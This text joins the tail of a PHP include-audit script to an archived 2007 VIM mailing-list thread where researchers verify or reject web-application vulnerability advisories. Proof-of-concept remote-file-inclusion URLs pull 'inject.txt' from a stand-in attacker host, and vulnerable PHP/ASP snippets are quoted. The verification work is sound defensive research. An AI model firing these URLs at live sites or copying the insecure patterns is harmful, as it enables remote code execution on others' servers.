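require_once $include_path.'/admin/config.inc.php';
require_once $include_path.'/lib/mysql.class.php';
"""

SPAW_LIKE = """<?php
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
"""

# Hypothetical: the pattern Steve asks about, an extract() on request data
# sitting between the assignment and the include.
OVERWRITE_LIKE = """<?php
$incpath = dirname(__FILE__);
extract($_REQUEST);
include("$incpath/body.inc.php");
"""

if __name__ == "__main__":
    for label, src in (("lazarus-like", LAZARUS_LIKE), ("spaw-like", SPAW_LIKE),
                       ("overwrite-like", OVERWRITE_LIKE)):
        for line_no, var, verdict in audit_includes(src):
            print(f"{label}: line {line_no}: ${var} -> {verdict}")
```

An "undefined-in-file" verdict is not a confirmed vulnerability; as with img_library.php it usually means the included config sets the variable, so it tells you which file to read next. The script is regex-based: it only sees includes whose path starts with a variable, and its comment stripping is deliberately crude.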
From heinbockel at mitre.org Wed Mar 14 13:21:36 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Wed, 14 Mar 2007 09:21:36 -0400
Subject: [VIM] SQL injection (x2) in NukeSentinel
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC01A93A62@IMCSRV5.MITRE.ORG>

BUGTRAQ:20070310 NukeSentinel <= 2.5.06 SQL Injection (mysql >= 4.0.24) Exploit
http://www.securityfocus.com/archive/1/archive/1/462453/100/0/threaded

Appears to be similar to CVE-2007-1172:
BUGTRAQ:20070220 NukeSentinel 2.5.05 (nukesentinel.php) File Disclosure Exploit
http://www.securityfocus.com/archive/1/archive/1/460599/100/0/threaded

Both exploits are SQL injections and the code looks remarkably similar. However, with the release of NukeSentinel 2.5.06, the vendor attempted to thwart CVE-2007-1172 with a weak regex -- In nukesentinel.php (line 61):

> if(!ereg("^([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})\\.([0-9]{1,3})", $nsnst_const['remote_ip'])) {$nsnst_const['remote_ip'] = "none"; }

So, they are checking to ensure the Client-IP HTTP Header contains a valid IP. Hence, the newer exploit code prepends a random dotted-quad IP address to the start of the SQL injection.

Therefore, this is viewed by CVE as a new vulnerability and will be assigned a new CVE.

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From noamr at beyondsecurity.com Wed Mar 14 16:25:03 2007
From: noamr at beyondsecurity.com (Noam Rathaus)
Date: Wed, 14 Mar 2007 18:25:03 +0200
Subject: [VIM] [TRUE] Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability
Message-ID: <200703141825.03987.noamr@beyondsecurity.com>

Hi,

The vulnerability is true, but what is the nature of the vulnerability here? minigzip is not officially used as far as I know, by anything?!

Anyone else?

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com -------------- next part -------------- An embedded message was scrubbed... From: "starcadi starcadi" Subject: Python 2.5 (Modules/zlib) minigzip local buffer overflow vulnerability Date: Wed, 14 Mar 2007 16:49:36 +0100 Size: 5537 Url: http://www.attrition.org/pipermail/vim/attachments/20070314/b47d56ce/attachment-0001.mht From noamr at beyondsecurity.com Wed Mar 14 16:30:48 2007 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Wed, 14 Mar 2007 18:30:48 +0200 Subject: [VIM] [TRUE] JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Message-ID: <200703141830.48310.noamr@beyondsecurity.com> Hi, The vulnerability is there (vulnerable code): author = Request.QueryString("author") bid = Request.QueryString("bid") ' Check parameters If Not IsNumeric(bid) Then bid = 0 End If If CInt(bid) < 0 Then bid = 0 End If If title = "" And author = "" Then Call ParseError(langErrSearchNoInput) Call DoErrorMsg("./search.asp") End If ' Generate SQL sql = "SELECT * FROM posts" If title <> "" Then sql = sql & " WHERE post_title LIKE '%" & title & "%'" End If If author <> "" Then If InStr(sql, "WHERE") <> 0 Then sql = sql & " AND user_name='" & author & "'" Else sql = sql & " WHERE user_name='" & author & "'" End If End If ---------- Forwarded Message ---------- Subject: JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Date: Tuesday 13 March 2007 19:21 From: UniquE at unique-key.org To: bugtraq at securityfocus.com JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Type : SQL Injection Release Date : {2007-03-13} Product / Vendor : JGBBS Is a Tree-style Online Forum System http://sourceforge.net/projects/jgbbs/ Bug : http://localhost/script/search.asp?author=-SQL Inj.-&bid=0 SQL Injection Exploit : JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Tested : JGBBS 3.0beta1
Vulnerable : JGBBS 3.0beta1
Author : UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-------------------------------------------------------

--
Noam Rathaus
CTO
1616 Anderson Rd.
McLean, VA 22102
Tel: 703.286.7725 extension 105
Fax: 888.667.7740
noamr at beyondsecurity.com
http://www.beyondsecurity.com

From coley at mitre.org  Wed Mar 14 17:04:08 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 14 Mar 2007 13:04:08 -0400 (EDT)
Subject: [VIM] [false] Remote File Include In Script PHP Photo Album
Message-ID: <200703141704.l2EH48Vw020813@faron.mitre.org>

Researcher: Hasadya Raed

Ref: BUGTRAQ:20070311 Remote File Include In Script PHP Photo Album
http://www.securityfocus.com/archive/1/archive/1/462559/100/0/threaded

from versions 0.3.2.6 (http://www.phpalbum.net/dw) and Beta 0.4.1-beta9 and
beta8 (http://www.phpalbum.net/), we have:

1) NO file named common.php

2) NO string "db_file" in any file

- Steve

From f.riphagen at nsec.nl  Thu Mar 15 19:44:16 2007
From: f.riphagen at nsec.nl (Ferdy Riphagen)
Date: Thu, 15 Mar 2007 20:44:16 +0100
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
Message-ID: <45F9A210.8080408@nsec.nl>

html/content.php contains:

$c_category = !isset($c_category)? "":$c_category;
include "./basepath.php";
$c_module = "content";
include "$c_basepath/base/groupit.start.inc";
..

After normal install basepath.php has (my case)

$c_basepath = "/chroot/apache2/www/test/groupit/groupit";
$c_block_cache = 1;
?>

I couldn't find load.inc.php, userprofile.php, dispatch.php (or I need some
sleep)

sources:
http://fresh.t-systems-sfr.com/unix/src/privat2/groupit-2.00b5.tar.gz/

-------- Original Message --------

ECHO_ADV_75$2007
-------------------------------------------------------------------------------------
[ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : March, 15th 2007
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv75-theday-2007.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Groupit
version : 2.00b5
URL : http://fresh.t-systems-sfr.com/fresh/unix/src/privat2/groupit-2.00b5.tar.gz

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

- Invalid include function at html/content.php

-----------------------html/content.php------------

----------------------------------------------------------

Input passed to the "$c_basepath" parameter in load.inc.php is not properly
verified before being used. This can be exploited to execute arbitrary PHP
code by including files from local or external resources.

also affected files :
html/userprofile.php
html/password.php
html/dispatch.php
html/deliver.php
and More ....

Proof Of Concept:
~~~~~~~~~~~~

http://localhost/groupit/html/content.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/userprofile.php?c_basepath=http://atacker.com/inject.txt?
http://localhost/groupit/html/password.php?c_basepath=http://atacker.com/inject.txt?

Solution:
~~~~

- Sanitize variable $c_basepath affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~ ~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy Nice Girl
~ az001,bomm_3x,matdhule
~ newbie_hacker at yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:
~ EcHo Research & Development Center
http://advisories.echo.or.id
erdc[at]echo[dot]or[dot]id
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------

From coley at linus.mitre.org  Thu Mar 15 19:53:14 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Mar 2007 15:53:14 -0400 (EDT)
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A210.8080408@nsec.nl>
References: <45F9A210.8080408@nsec.nl>

hmmmm. This was reported by the_day, who's been around for a couple years and
has been pretty reliable in my experience. I'm not contradicting you Ferdy, I
just wonder where the disconnect is. This one begs for some resolution.

- Steve

From theall at tenablesecurity.com  Thu Mar 15 20:09:49 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 15 Mar 2007 16:09:49 -0400
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A210.8080408@nsec.nl>
References: <45F9A210.8080408@nsec.nl>
Message-ID: <45F9A80D.5030106@tenablesecurity.com>

On 03/15/07 15:44, Ferdy Riphagen wrote:

> html/content.php contains:
> $c_category = !isset($c_category)? "":$c_category;
> include "./basepath.php";
> $c_module = "content";
> include "$c_basepath/base/groupit.start.inc";
> ..
> After normal install basepath.php has (my case)
> $c_basepath = "/chroot/apache2/www/test/groupit/groupit";
> $c_block_cache = 1;
> ?>
>
> I couldn't find load.inc.php, userprofile.php, dispatch.php (or I need
> some sleep)

I haven't set it up, but looking at the code in
groupit/base/groupit.start.inc I see it registers any global variables passed
in if register_globals is disabled or magic_quotes_gpc is enabled; eg,

if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc()))
{
    /* Register our own global variables when register_globals in
       php.ini is disabled. */
    reset($HTTP_ENV_VARS);
    reset($HTTP_GET_VARS);
    reset($HTTP_POST_VARS);
    reset($HTTP_COOKIE_VARS);
    reset($HTTP_SERVER_VARS);
    while (list ($key, $val) = each ($HTTP_POST_FILES))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_ENV_VARS))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_GET_VARS))
        $GLOBALS[$key]=stripslashes($val);
    while (list ($key, $val) = each ($HTTP_POST_VARS))
        $GLOBALS[$key]=stripslashes($val);
    while (list ($key, $val) = each ($HTTP_COOKIE_VARS))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_SERVER_VARS))
        $GLOBALS[$key]=$val;

So while I don't know about the missing files, it does seem that an attacker
may be able to overwrite $c_basepath, which will then be used further down in
this file to include at least two files.

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com  Thu Mar 15 20:03:48 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 15 Mar 2007 14:03:48 -0600
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A210.8080408@nsec.nl>
References: <45F9A210.8080408@nsec.nl>
Message-ID: <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com>

How goes it Ferdy,

content.php contains:

line 5: include "$c_basepath/base/groupit.start.inc";

groupit.start.inc contains (if ! register_globals or if magic quotes = on the
program is vulnerable)

if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc()))
{
    /* Register our own global variables when register_globals in
       php.ini is disabled. */
    reset($HTTP_ENV_VARS);
    reset($HTTP_GET_VARS);
    reset($HTTP_POST_VARS);
    reset($HTTP_COOKIE_VARS);
    reset($HTTP_SERVER_VARS);
    while (list ($key, $val) = each ($HTTP_POST_FILES))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_ENV_VARS))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_GET_VARS))
    {
        $GLOBALS[$key]=stripslashes($val);
        echo "$key $val";
    }
    while (list ($key, $val) = each ($HTTP_POST_VARS))
        $GLOBALS[$key]=stripslashes($val);
    while (list ($key, $val) = each ($HTTP_COOKIE_VARS))
        $GLOBALS[$key]=$val;
    while (list ($key, $val) = each ($HTTP_SERVER_VARS))
        $GLOBALS[$key]=$val;

    if (is_array($HTTP_POST_FILES))
    {
        reset($HTTP_POST_FILES);
        while (list($key, $val) = each($HTTP_POST_FILES))
        {
            $GLOBALS[$key] = $val['tmp_name'];
            $GLOBALS["$key" . "_name"] = $val['name'];
            $GLOBALS["$key" . "_size"] = $val['size'];
            $GLOBALS["$key" . "_type"] = $val['type'];
        }
    }
}

Later down the file line 96. Contains:

include "$c_basepath/base/groupit.library.inc";

I'm pretty sure this is where the vuln is occurring.

/str0ke

From theall at tenablesecurity.com  Thu Mar 15 20:11:16 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Thu, 15 Mar 2007 16:11:16 -0400
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com>
References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com>
Message-ID: <45F9A864.4080909@tenablesecurity.com>

On 03/15/07 16:03, str0ke wrote:

> content.php contains:

I hate it when that happens! I swear, I did poll for new mail before I sent
my message...
:-(

George
--
theall at tenablesecurity.com

From str0ke at milw0rm.com  Thu Mar 15 20:15:22 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 15 Mar 2007 14:15:22 -0600
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A864.4080909@tenablesecurity.com>
References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com>
Message-ID: <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com>

On 3/15/07, George A. Theall wrote:
> I hate it when that happens! I swear, I did poll for new mail before I

2 confirms is always better than 1 ;)

/str0ke

From f.riphagen at nsec.nl  Thu Mar 15 20:24:12 2007
From: f.riphagen at nsec.nl (Ferdy Riphagen)
Date: Thu, 15 Mar 2007 21:24:12 +0100
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A80D.5030106@tenablesecurity.com>
References: <45F9A210.8080408@nsec.nl> <45F9A80D.5030106@tenablesecurity.com>
Message-ID: <45F9AB6C.7070506@nsec.nl>

Did I miss that...%&#)

> On 03/15/07 15:44, Ferdy Riphagen wrote:
>
>> html/content.php contains:
>> $c_category = !isset($c_category)? "":$c_category;
>> include "./basepath.php";
>> $c_module = "content";
>> include "$c_basepath/base/groupit.start.inc";
> ..
>> After normal install basepath.php has (my case)
>> $c_basepath = "/chroot/apache2/www/test/groupit/groupit";
>> $c_block_cache = 1;
>> ?>
>>
>> I couldn't find load.inc.php, userprofile.php, dispatch.php (or I
>> need some sleep)
>
> I haven't set it up, but looking at the code in
> groupit/base/groupit.start.inc I see it registers any global variables
> passed in if register_globals is disabled or magic_quotes_gpc is
> enabled; eg,
>
> if (!get_cfg_var("register_globals") || (get_magic_quotes_gpc()))
> {
>     /* Register our own global variables when register_globals in
>        php.ini is disabled. */
>     reset($HTTP_ENV_VARS);
>     reset($HTTP_GET_VARS);
>     reset($HTTP_POST_VARS);
>     reset($HTTP_COOKIE_VARS);
>     reset($HTTP_SERVER_VARS);
>     while (list ($key, $val) = each ($HTTP_POST_FILES))
>         $GLOBALS[$key]=$val;
>     while (list ($key, $val) = each ($HTTP_ENV_VARS))
>         $GLOBALS[$key]=$val;
>     while (list ($key, $val) = each ($HTTP_GET_VARS))
>         $GLOBALS[$key]=stripslashes($val);
>     while (list ($key, $val) = each ($HTTP_POST_VARS))
>         $GLOBALS[$key]=stripslashes($val);
>     while (list ($key, $val) = each ($HTTP_COOKIE_VARS))
>         $GLOBALS[$key]=$val;
>     while (list ($key, $val) = each ($HTTP_SERVER_VARS))
>         $GLOBALS[$key]=$val;
>
> So while I don't know about the missing files, it does seem that an
> attacker may be able to overwrite $c_basepath, which will then be used
> further down in this file to include at least two files.
>
>
> George

From f.riphagen at nsec.nl  Thu Mar 15 20:25:55 2007
From: f.riphagen at nsec.nl (Ferdy Riphagen)
Date: Thu, 15 Mar 2007 21:25:55 +0100
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com>
References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com> <814b9d50703151315ra2356devbbfc25bddff0c38@mail.gmail.com>
Message-ID: <45F9ABD3.7070807@nsec.nl>

str0ke wrote:
> On 3/15/07, George A. Theall wrote:
>> I hate it when that happens! I swear, I did poll for new mail before I
>
> 2 confirms is always better than 1 ;)
>
> /str0ke
>
>
You both are right. I see it too now... I go to sleep.

From coley at linus.mitre.org  Thu Mar 15 20:34:17 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 15 Mar 2007 16:34:17 -0400 (EDT)
Subject: [VIM] [ECHO_ADV_75$2007] Groupit 2.00b5 (c_basepath) Remote File Inclusion Vulnerability
In-Reply-To: <45F9A864.4080909@tenablesecurity.com>
References: <45F9A210.8080408@nsec.nl> <814b9d50703151303k4a90a8c7k34a0a4c8544cb28a@mail.gmail.com> <45F9A864.4080909@tenablesecurity.com>

On Thu, 15 Mar 2007, George A. Theall wrote:

> On 03/15/07 16:03, str0ke wrote:
>
> > content.php contains:
>
> I hate it when that happens! I swear, I did poll for new mail before I
> sent my message... :-(

Nah, it just goes to show that brilliance operates in parallel :)

- Steve

From coley at linus.mitre.org  Fri Mar 16 20:23:03 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Fri, 16 Mar 2007 16:23:03 -0400 (EDT)
Subject: [VIM] Bogus - [c_r_ck@hotmail.com: Lazarus Guestbook (admin.php)Remote File Include Expliot]
In-Reply-To: <20070307230204.GT17103@securityfocus.com>
References: <20070307230204.GT17103@securityfocus.com>

Below is a writeup from a CVE analyst that suggests that versions *before*
1.7.3 were vulnerable, and that it got patched:

http://carbonize.co.uk/Lazarus/Forum/index.php?topic=1164.0

ACCURACY: 1.7.3 is not vulnerable. Its admin.php has these four code sections
in this safe order:

(1) extract all GPC variables using the typical "$$name = $value" approach,
(2) check for an inclusion attack: if (isset($include_path)) { die("Hacking Attempt!"); },
(3) define include_path before use: $include_path = dirname(__FILE__);,
(4) use $include_path in various require_once and include statements within
    the application.

The last previous available version (1.7) of admin.php uses a different
ordering. Based on the vendor's comments below, this unsafe ordering
apparently persisted up until 1.7.2. The unsafe ordering is:

(1) $include_path = dirname(__FILE__);,
(2) immediately use $include_path in require_once statements (this is OK),
(3) extract all GPC variables using the typical "$$name = $value" approach,
    thus overwriting $include_path,
(4) call an external constructor, located in the template.class.php file:
    new gb_template($include_path);,
(5) the gb_template constructor sets $this->root_dir to the unsafe value of
    $include_path,
(6) other functions in the gb_template class use $this->root_dir for
    inclusion, e.g., get_content calls include $this->root_dir.'/lang/english.php';,
(7) there is always a call to this get_content function within the main flow
    of control in admin.php.

In other words, admin.php in versions before 1.7.3 doesn't allow remote file
inclusion within this file itself, but does trigger remote file inclusion in a
different file.

ACKNOWLEDGEMENT: The vendor says "March 03, 2007 ... An [sic] cross site
scripting vulnerability exists in Lazarus and so I have released 1.7.3 to
patch it." The vendor apparently misunderstands the term cross site
scripting, and actually meant that a php-include vulnerability was fixed.
The vendor also (on 20070304) responds to a request about how to manually
patch by saying "Open admin.php and find the ... if (!isset($PHP_SELF)) ...
block ... and move it to before where $include_path is set. Just download the
update and look at admin.php to see what I mean." In other words, the vendor
is indicating that include_path must be set safely after the GPC variable
extraction occurs. The application only uses include_path in require/include
statements. It does not print out the value of include_path. Thus, it is
fairly clear that the vendor was not actually talking about an XSS
vulnerability.

From theall at tenablesecurity.com  Mon Mar 19 11:18:55 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Mon, 19 Mar 2007 07:18:55 -0400
Subject: [VIM] Bogus - [CLBOX <= (signup.php header) Remote File Include Vulnerability]
Message-ID: <45FE719F.601@tenablesecurity.com>

In signup.php, we have:

require "inc/lib.inc";
@include "$header";

and at the base of the include file we see:

$header = "../header.php";

While I haven't bothered to actually install the software, this sure looks
bogus to me.

George
--
theall at tenablesecurity.com

From jericho at attrition.org  Tue Mar 20 11:01:38 2007
From: jericho at attrition.org (security curmudgeon)
Date: Tue, 20 Mar 2007 11:01:38 +0000 (UTC)
Subject: [VIM] WebAPP Audit

As most of you may have noticed, WebAPP has gone under a fairly heavy audit
and the changelog for 0.9.9.5:

http://www.web-app.org/cgi-bin/index.cgi?action=viewnews&id=250

Shortly after, 0.9.9.6 was released saying:

"WebAPP had security audits done by professionals, and several previously
uncovered major security issues were found, along with some more minor things
that can negatively impact security."

They aren't releasing details yet to give web sites a chance to upgrade.

Shortly after that, they released a patch to fix a remote cookie manipulation
based attack that can let a remote attacker take over the admin account:

http://www.web-app.org/cgi-bin/index.cgi?action=downloadinfo&cat=crip&id=2

I'm a bit curious who the 'professionals' were that did the audit leading to
0.9.9.6 and the details of the subsequent exploit.

From theall at tenablesecurity.com  Tue Mar 20 11:31:08 2007
From: theall at tenablesecurity.com (George A. Theall)
Date: Tue, 20 Mar 2007 07:31:08 -0400
Subject: [VIM] WebAPP Audit
Message-ID: <45FFC5FC.3050303@tenablesecurity.com>

On 03/20/07 07:01, security curmudgeon wrote:
> As most of you may have noticed, WebAPP has gone under a fairly heavy
> audit and the changelog for 0.9.9.5:
...
> I'm a bit curious who the 'professionals' were that did the audit
> leading to 0.9.9.6 and the details of the subsequent exploit.

I was looking at this last week. It seems like the WebAPP project has forked,
with two groups bickering over control. The people maintaining webapp.net
have been suggesting that the code as maintained by webapp.org can be abused
to compromise a system. The maintainer of webapp.org solicited help from
members of blackcode.com, who I suspect are the "security professionals"
referred to in the advisory. Follow the fun here:

http://newbc.blackcode.com/forum/index.php?t=msg&th=1167

I haven't had a chance to look into the latest patch, but I did find two
vectors by which an authenticated attacker could execute arbitrary code in
version 0.9.9.5, but that's subject to the privileges of the web server user
id.

George
--
theall at tenablesecurity.com

From webapp at sitespot.us  Tue Mar 20 14:18:34 2007
From: webapp at sitespot.us (WebAPP)
Date: Tue, 20 Mar 2007 06:18:34 -0800
Subject: [VIM] WebAPP Audit
Message-ID: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net>

Hi,

I came upon this email posted about our recent security issues with WebAPP.
I am more than willing to communicate directly with anyone with an interest
in the security issues we have been recently addressing at the WebAPP project
at web-app.org.

As you have noticed, we have been releasing several new releases lately. This
is being done in an attempt to keep up with actual and threatened attacks
against web-app.org members and their websites done by the group operating
another "WebAPP" site at web-app.net since late May last year.

WebAPP 0.9.9.5 was released as a bug fix package with some patches for some
relatively minor client side XSS issues found near time of release by a
member of blackcode.org.
The request for help at blackcode was made by me in response to some news
articles posted at DIGG by "Monty53" where he claimed our script had a major
hole that allowed command execution on the server.

Following that release, we continued to work on security. WebAPP 0.9.9.6 was
a much more major overall upgrade including a patch for an issue so serious
that I fear for the time the details of it may become publicly available.
This vulnerability was found by another professional who wishes to remain
anonymous for the sake of his career, again due to the threat of retaliatory
attacks by web-app.net.

The most recent cookies attack by "Monty53 of Turkey" to overtake the admin
account at web-app.org was relatively trivial in comparison to the
vulnerability mentioned above. I am convinced that this cookies problem has
been a longstanding issue. The patch we released most recently should help
prevent the method that was used in the case of the hack attack on the WebAPP
site, but there are likely to be other ways and other things that have not
yet been dealt with completely. We continue working at this time and have yet
another release planned to be made public quite soon, with yet more security
work.

Apparently On Elpeleg, our former Security Chief, overlooked some things
during his supervision of security for the WebAPP project through May 2006 at
web-app.org. Now Mr. Elpeleg has been demonstrating his realization of many
of these long term security issues following his move to web-app.net, using
web-app.org's membership and forums database, and where "WebAPP" version
0.9.9.3.4 is being released in a slightly modified form as "0.9.9.7". I must
assert that our upgrades at web-app.org include a whole lot more work,
security and otherwise.

So that's pretty much where we stand.
Since you seem to have taken an interest in this, please advise as to what,
given the current circumstances, and with minimization of risk to users, you
would like to see from the WebAPP project in the future regarding more
complete security information.

Thank you,

Jos Brown
web-app.org

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.attrition.org/pipermail/vim/attachments/20070320/6b949099/attachment.html

From coley at mitre.org  Tue Mar 20 21:28:01 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 20 Mar 2007 17:28:01 -0400 (EDT)
Subject: [VIM] Typo in researcher credits for "file" vulnerability
Message-ID: <200703202128.l2KLS1Yd009965@faron.mitre.org>

MLIST:[file] 20070302 file-4.20 is now available
URL:http://mx.gw.com/pipermail/file/2007/000161.html
CONFIRM:https://bugs.gentoo.org/show_bug.cgi?id=171452

The original vendor disclosure credited "Jean-Sebastien Guay-Lero," and this
cascaded everywhere. But it's most likely "Jean-Sebastien Guay-Leroux," who's
reported a few issues in the past.

- Steve

From ge at linuxbox.org  Tue Mar 20 21:49:53 2007
From: ge at linuxbox.org (Gadi Evron)
Date: Tue, 20 Mar 2007 16:49:53 -0500 (CDT)
Subject: [VIM] Typo in researcher credits for "file" vulnerability
In-Reply-To: <200703202128.l2KLS1Yd009965@faron.mitre.org>

On Tue, 20 Mar 2007, Steven M. Christey wrote:
>
> MLIST:[file] 20070302 file-4.20 is now available
> URL:http://mx.gw.com/pipermail/file/2007/000161.html
> CONFIRM:https://bugs.gentoo.org/show_bug.cgi?id=171452
>
> The original vendor disclosure credited "Jean-Sebastien Guay-Lero,"
> and this cascaded everywhere. But it's most likely "Jean-Sebastien
> Guay-Leroux," who's reported a few issues in the past.

I was recently quoted and some stuff was attributed to me in a book. I was
referred to as "Evi Gadron".
hehe

>
> - Steve
>

From webapp at sitespot.us  Wed Mar 21 17:03:38 2007
From: webapp at sitespot.us (WebAPP)
Date: Wed, 21 Mar 2007 09:03:38 -0800
Subject: [VIM] WebAPP Audit
References: <003b01c76afa$b0430920$0500a8c0@hsd1.wa.comcast.net>
Message-ID: <000801c76bda$e0da6480$0500a8c0@hsd1.wa.comcast.net>

There was an attempt again today to hijack the admin account using altered
cookies. This attempt was unsuccessful. We know who made the attempt and
suspect it to be the same person as last time. This time the method was
recorded. If the same method was used, apparently the current patch we are
using on the site is successful at preventing this. There will be a new
version out soon.

Guys, It's not very helpful to read about how people have found exploits and
not be told what they are. We're trying our best at web-app.org to catch up
with long neglected security issues. Any information you might have would be
helpful. Were you saying you found some exploits?

Jos Brown
web-app.org

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.attrition.org/pipermail/vim/attachments/20070321/7c3068b7/attachment-0001.html

From coley at mitre.org  Wed Mar 21 17:29:57 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 21 Mar 2007 13:29:57 -0400 (EDT)
Subject: [VIM] Clarification on MySQL versions for single-row subselect DoS
Message-ID: <200703211729.l2LHTvox002629@faron.mitre.org>

FYI, MySQL notified CVE that this was originally reported as being before
5.0.37, but it's before 5.0.36. It was also originally reported by a
different organization, so we have another parallel discovery if anybody
tracks those things.

What wasn't originally entirely apparent to me was that this seems to be an
issue only when doing sorting on a set with just one row. I bet there are
similar bugs out there in other products with similar difficulties.
- Steve

======================================================
Name: CVE-2007-1420
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1420
Reference: BUGTRAQ:20070309 SEC Consult SA-20070309-0 :: MySQL 5 Single Row Subselect Denial of Service
Reference: URL:http://www.securityfocus.com/archive/1/archive/1/462339/100/0/threaded
Reference: MISC:http://www.sec-consult.com/284.html
Reference: CONFIRM:http://dev.mysql.com/doc/refman/5.0/en/releasenotes-es-5-0-36.html
Reference: CONFIRM:http://bugs.mysql.com/bug.php?id=24630
Reference: BID:22900
Reference: URL:http://www.securityfocus.com/bid/22900
Reference: FRSIRT:ADV-2007-0908
Reference: URL:http://www.frsirt.com/english/advisories/2007/0908
Reference: SECUNIA:24483
Reference: URL:http://secunia.com/advisories/24483

MySQL 5.x before 5.0.36 allows local users to cause a denial of service
(database crash) by performing information_schema table subselects and using
ORDER BY to sort a single-row result, which prevents certain structure
elements from being initialized and triggers a NULL dereference in the
filesort function.

From coley at mitre.org  Wed Mar 21 18:10:05 2007
From: coley at mitre.org (Steven M. Christey)
Date: Wed, 21 Mar 2007 14:10:05 -0400 (EDT)
Subject: [VIM] uh-oh - MARC
Message-ID: <200703211810.l2LIA5PH003424@faron.mitre.org>

Uh-oh, my URL's to marc.theaimsgroup.com are being forwarded to marc.info/.
And the background is white, too. At least the URL's seem to be preserved
across the redirects.

- Steve

From steve at vitriol.net  Wed Mar 21 18:26:37 2007
From: steve at vitriol.net (Steve Tornio)
Date: Wed, 21 Mar 2007 13:26:37 -0500
Subject: [VIM] uh-oh - MARC
In-Reply-To: <200703211810.l2LIA5PH003424@faron.mitre.org>
References: <200703211810.l2LIA5PH003424@faron.mitre.org>
Message-ID: <460178DD.9070807@vitriol.net>

Steven M. Christey wrote:
> Uh-oh, my URL's to marc.theaimsgroup.com are being forwarded to
> marc.info/. And the background is white, too. At least the URL's
> seem to be preserved across the redirects.
>
> - Steve
>

From their news page:

2007-03-18

